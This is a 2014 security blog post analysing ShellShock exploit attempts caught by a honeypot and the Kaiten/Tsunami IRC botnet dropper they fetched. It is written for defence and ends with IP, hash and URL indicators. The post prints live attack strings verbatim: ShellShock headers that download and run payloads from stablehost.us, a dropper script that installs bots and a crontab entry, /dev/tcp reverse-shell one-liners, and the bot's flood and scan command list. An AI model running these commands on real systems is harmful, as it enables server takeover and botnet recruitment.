by  Marirs

ShellShock - Hello Honeypot

ShellShock & Linux.Backdoor.Kaiten

Ok, today, I got an alert from one of my honeypots and I was overwhelmed to see, that, it was a ShellShock call :-)

This post is going to be very rudimentary, as I want to first get the information out to as many as I can.

Here is what my log alert that my honeypot picked up:


28-09-2014 09:43:55,121.9.244.212,() { :;}; /bin/bash -c "wget http[:]//stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http[:]//stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh",

Update: (29/9/2014) I got 2 more alerts from my honeypot


29-09-2014 07:43:08,,67.227.0.73,() { :;}; /bin/bash -c "wget -P /var/tmp 174.143.240.43/…/x  perl /var/tmp/x",
29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a

So being curious, I looked up first to find out who is 121.9.244.212 and it results to "CHINANET-GD"

Next, comes the big main thing:

() { :;}; /bin/bash -c “wget http[:]//stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http[:]//stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh

The command represents where the remote attacker is trying to (or) inject malicious code; arbitrary code following a function definition to download a file to the /tmp directory with a file called 'sh'.

Whats in the file?


killall perl
wget http://stablehost.us/bots/kaiten.c -O /tmp/a.c;
curl -o /tmp/a.c http://stablehost.us/bots/kaiten.c;
gcc -o /tmp/a /tmp/a.c;
/tmp/a;
rm -rf /tmp/a.c;
wget http://stablehost.us/bots/a -O /tmp/a;
curl -o /tmp/a http://stablehost.us/bots/a;
chmod +x /tmp/a;
/tmp/a;
wget http://stablehost.us/bots/darwin -O /tmp/d;
curl -o /tmp/d http://stablehost.us/bots/darwin;
chmod +x /tmp/d;
/tmp/d;
wget http://stablehost.us/bots/pl -O /tmp/pl;
curl -o /tmp/pl http://stablehost.us/bots/pl;
perl /tmp/pl;
rm /tmp/pl;
echo “@weekly curl -o /tmp/sh http://stablehost.us/bots/regular.bot;wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh” >/tmp/c;
crontab /tmp/c;
rm /tmp/c;

So, now once downloaded, its going to be doing a series of tasks.

  • Download a “.C” file and compile it using "gcc".
  • sandbox-mac:dump user$ md5 kaiten.c
  • MD5 (kaiten.c) = e5807250e25da45e287afb2f1e4580d6

Download 2 binary files:

  • "a" MD5 (a) = 7390a1e62a88eb80b5fae80c9eb00be7 – Backdoor.Linuz/Tsunami
  • "darwin" MD5 (d) = adacf1fa8cd7f77ae83ba38a99160bdb – Backdoor:OSX/Tsunami.A

Makes it executable and executes them.

Next it brings down a Perl file (pl) and executes the perl file
sandbox-mac:dump user$ md5 pl
MD5 (pl) = 0c25bee177101b4235022d694c0de4d3

The perl file, basically checks for other vulnerabilities, does port scanning, check news from packet storm, Install Socks5, does nmap, sql scanner, checks if the box is root-able, open up IRC channels, does TCP/UDP/Http Floods based on commands received from Master, do Scanning activity to domains like, MSN, AlltheWeb, Ask, AOL, Lycos, Yahoo, etc.

The commands to send are:


# !bot @multiscan  
# !bot @socks5
# !bot @sql2  

# !bot @portscan 
# !bot @logcleaner
# !bot @sendmail    
# !bot @system
# !bot @cleartmp
# !bot @rootable
# !bot @nmap   
# !bot @back   
# !bot @linuxhelp
# !bot @cd tmp:. | for example
#-----[Advisory-New Based]-----
# !bot @packetstorm
# !bot @milw0rm
#-----[DDos Based]-----
# !bot @udpflood   
# !bot @tcpflood    
# !bot @httpflood  
# !bot @sqlflood  
#-----[IRC Based]-----
# !bot @killme  
# !bot @join #channel
# !bot @part #channel
# !bot @reset
# !bot @voice 
# !bot @owner 
# !bot @deowner 
# !bot @devoice 
# !bot @halfop 
# !bot @dehalfop 
# !bot @op 
# !bot @deop 
#-----[Flooding Based]-----
# !bot @msgflood 
# !bot @dccflood 
# !bot @ctcpflood 
# !bot @noticeflood 
# !bot @channelflood
# !bot @maxiflood

IRC Names:


"telnet","putty","cgi-bin","bash","tmp","var","omset","dat","chynthe","bed"

And then do a weekly refresh of the bot activity or updates using crontab.

[[email protected]]# whois stablehost.us
Domain Name: stablehost.us
Registry Domain ID: D26827113-US
Registrar WHOIS Server: whois.opensrs.net
Registrar URL: www.opensrs.com
Updated Date: 2016-06-25T18:04:25Z
Creation Date: 2010-03-16T20:28:06Z
Registry Expiry Date: 2018-03-15T23:59:59Z
Registrar: Tucows Domains Inc.
Registrar IANA ID: 69
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: C53573270-US
Registrant Name: sben koutsoukis
Registrant Organization:
Registrant Street: 2 STAROSLOBODSKIY PEREULOK
Registrant Street:
Registrant Street:
Registrant City: moscow
Registrant State/Province:
Registrant Postal Code: 089
Registrant Country: RU
Registrant Phone: +7.4959384737
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Registrant Application Purpose: P3
Registrant Nexus Category: C11
Registry Admin ID: C53573271-US
Admin Name: sben koutsoukis
Admin Organization:
Admin Street: 2 STAROSLOBODSKIY PEREULOK
Admin Street:
Admin Street:
Admin City: moscow
Admin State/Province:
Admin Postal Code: 089
Admin Country: RU
Admin Phone: +7.4959384737
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
Registry Tech ID: C53573272-US
Tech Name: sben koutsoukis
Tech Organization:
Tech Street: 2 STAROSLOBODSKIY PEREULOK
Tech Street:
Tech Street:
Tech City: moscow
Tech State/Province:
Tech Postal Code: 089
Tech Country: RU
Tech Phone: +7.4959384737
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: [email protected]
Name Server: nirvana.easydns.net
Name Server: rush.easydns.com
Name Server: motorhead.easydns.org
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2017-11-22T06:44:25Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NeuStar, Inc., the Registry Administrator for .US, has collected this information for the 
WHOIS database through a .US-Accredited Registrar. This information is provided to you for 
informational purposes only and is designed to assist persons in determining contents of a 
domain name registration record in the NeuStar registry database. NeuStar makes this 
information available to you "as is" and does not guarantee its accuracy. By submitting a 
WHOIS query, you agree that you will use this data only for lawful purposes and that, under 
no circumstances will you use this data: (1) to allow, enable, or otherwise support the 
transmission of mass unsolicited, commercial advertising or solicitations via direct mail, 
electronic mail, or by telephone; (2) in contravention of any applicable data and privacy 
protection laws; or (3) to enable high volume, automated, electronic processes that apply to 
the registry (or its systems). Compilation, repackaging, dissemination, or other use of the 
WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without 
NeuStar's prior written permission. NeuStar reserves the right to modify or change these 
conditions at any time without prior or subsequent notification of any kind. By executing this 
query, in any manner whatsoever, you agree to abide by these terms. NOTE: FAILURE TO LOCATE A 
RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain 
names are subject to certain additional domain name registration rules. For details, please 
visit our site at www.whois.us.

It runs Apache on Ubuntu

[[email protected]]# curl -I stablehost.us
HTTP/1.1 200 OK
Date: Sun, 28 Sep 2014 07:33:15 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sat, 27 Sep 2014 19:57:07 GMT
ETag: “0-50411703b49e2”
Accept-Ranges: bytes
Content-Type: text/html
                

At the time of writing this article, the website is empty, probably with a blank index page (200 OK). The directory that serves the bots is also probably having a blank index page.

[[email protected]]# curl -I http://stablehost.us/bots/
HTTP/1.1 200 OK
Date: Sun, 28 Sep 2014 07:38:23 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.4
Content-Type: text/html
            

According to way-back machine, there are/were only 3 edits/snapshots in the entirety of the domain life.
Wayback Machine Results

2 Blank page updates on March 1, 2011 & Aug 27, 2011 and 1 Apache test page on Jan 10, 2014.

Here is where it gets more interesting. I can confirm that this domain was purely used for bot activity.

According to the way back machine March 1, 2011 we can see the bot directory in there with the perl file and the regular.bot file
Wayback Machine Bot directory Results

After a new bot addition

In Conclusion:

We have 1 more pattern:

121.9.244.212 – CHINANET ShellShock Command: () { :;}; /bin/bash -c "wget http[:]//stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http[:]//stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
In addition to these:
67.229.128.88 – Krypt Technologies (US) Shellshock Command: () { :; }; /bin/bash -i > /dev/tcp/67.229.128.88/9527 0<&1 2>&1
153.121.58.243 – Sakura Internet (Japan) Shellshock Comand: () { :; }; /bin/bash -i >& /dev/tcp/153.121.58.243/443 0>&1
82.99.57.32 – Datasmeden (Sweden) Shellshock Commands: () { :;}; /bin/bash -i >& /dev/tcp/82.99.57.32/443 0>&1 () { :;}; /bin/bash -c “/bin/bash -i >& /dev/tcp/82.99.57.32/443″ () { :;}; /bin/bash -c “/bin/bash -i >& /dev/tcp/82.99.57.32/443 0>&1″
114.96.140.114 – Chinanet Anhui Province Network (China) Shellshock Command: () { :; }; /usr/bin/bash -i >& /dev/tcp/114.96.140.114/6032 0>&1
113.10.223.171 – NWT iDC Data Service (Hong Kong) Shellshock Command: () { :; }; /bin/bash -i > /dev/tcp/113.10.223.171/8080 0<&1 2>&1

Some Indicators that we can look for in our web/proxy logs:


121.9.244.212 (ISP)
89.33.193.10 (PERL BOT)
142.4.215.115 ( { :;}; /bin/bash -c “cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji”)
67.227.0.73
174.143.240.43
54.64.179.8
54.251.83.67
142.0.41.57
153.121.58.243
67.229.128.88
67.227.0.74
82.99.57.32
114.96.140.114
113.10.223.171
104.192.103.6
72.167.37.182
204.232.241.139
46.161.41.142
75.127.84.182
37.187.225.119
195.225.34.101
202.137.176.146
81.18.135.38
94.102.52.10
82.118.242.223
142.4.215.115
201.205.255.56
83.96.168.161
199.27.89.22
5.135.127.38
103.28.36.123
82.80.195.86
89.207.135.125
194.54.9.11
173.45.100.18
192.227.213.66
70.42.149.72

Web Requests: (some of the hardcoded urls in the perl file)


http://stablehost.us
http://singlesaints.com
http://search.hotbot.de/cgi-bin/pursuit?pag=&query=”
http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=
http://www.mozbot.fr/search?q=
http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=
http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=
http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=
http://busca.uol.com.br/www/index.html?q=
http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=

Hope this helps.

Update (29/Sep/2014): Stablehost.us is down!

[[email protected]]# curl -I stablehost.us
curl: (6) Could not resolve host: stablehost.us